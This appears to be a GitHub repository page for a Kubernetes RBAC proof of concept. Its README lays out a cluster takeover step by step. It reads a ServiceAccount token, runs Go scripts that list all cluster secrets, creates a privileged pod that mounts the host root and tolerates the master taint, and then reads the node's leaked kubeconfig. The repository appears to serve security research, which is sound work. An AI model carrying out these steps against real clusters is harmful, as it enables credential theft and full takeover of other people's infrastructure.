Skip to content

HouqiyuA/k8s-rbac-poc

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits

README.md

README.md

 
 

createPod.go

createPod.go

 
 

listSecret.go

listSecret.go

 
 

Repository files navigation

README

  1. Get excessive privileges ServiceAccount token:
# If you're in the pod
cat /var/run/secrets/kubernetes.io/serviceaccount/token
# If you are on the node
kubectl describe secret <serviceaccount-token> # Replace <serviceaccount-token> with the Token name of the ServiceAccount with excessive privileges
  1. Example of combining list secrets and create pods permissions to take over the cluster

Note: You need to add the information you want to use in the go code such as token and host first

# Get the entire cluster secrets and get a token with create pods privileges.
go run listSecret.go
# Use this token to create a privileged container that mounts the root directory and sets taint tolerance to exclude it from the master node, leaking the kubeconfig configuration file
go run createPod.go
# Access to this privileged container
kubectl exec -it nginx-pod-mount2 -n default -- bash
# View leaked kubeconfig file
cat /host/home/ubunt/.kube/config

IMPORTANT NOTICE: This program (or code) is intended for research and study purposes only. Its use for any illegal activity, invasion of privacy or violation of the Terms of Service is prohibited. The author is not responsible for the consequences of any misuse of this project.

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages